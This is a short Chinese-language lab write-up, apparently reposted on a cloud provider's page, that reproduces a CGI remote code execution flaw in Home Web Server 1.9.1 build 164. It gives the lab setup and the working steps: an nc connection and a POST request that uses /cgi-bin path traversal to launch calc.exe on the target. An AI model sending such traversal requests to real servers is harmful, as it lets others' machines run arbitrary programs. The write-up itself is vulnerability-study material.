標籤:利用 參考 png cal kali exploit 訪問 server 漏洞
一、 Home Web Server 1.9.1 build 164 - CGI Remote Code Execution複現
漏洞描述:
Home Web Server允許調用CGI程式來通過POST請求訪問位於/cgi-bin下的檔案,然後通過目錄遍曆,就有可能執行遠程主機的任意可執行程式。
漏洞影響範圍:
Home Web Server 1.9.1 build 164
漏洞複現:
利用原理:
NC串連發送開啟計算機請求,安裝Home Web Server 1.9.1 build 164的主機就會自動開啟計算機程式。
環境搭建:
攻擊機:Kali-Linux-2017.1-vm-amd64 IP:192.168.18.250
靶機:Windows 10 Version 1703(x64) IP:192.168.18.112
Windows10系統中安裝並開啟Home Web Server 1.9.1 build 164
Kali中使用NC建立串連,命令為:nc 192.168.18.112 80
發送POST請求:POST /cgi-bin/../../../../../../../../Windows/system32/calc.exe HTTP/1.1
當返回400響應時,按Ctrl+C終止請求,此時可以看到windows10自動開啟了計算機程式
參考連結:https://www.exploit-db.com/exploits/42128/
Home Web Server 1.9.1 build 164 - CGI Remote Code Execution複現
Start building with 50+ products and up to 12 months usage for Elastic Compute Service
1 on 1 presale consultation
24/7 Technical Support 6 Free Tickets per Quarter Faster Response
Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.
A comprehensive suite of global cloud computing services to power your business
Payment Methods We Support
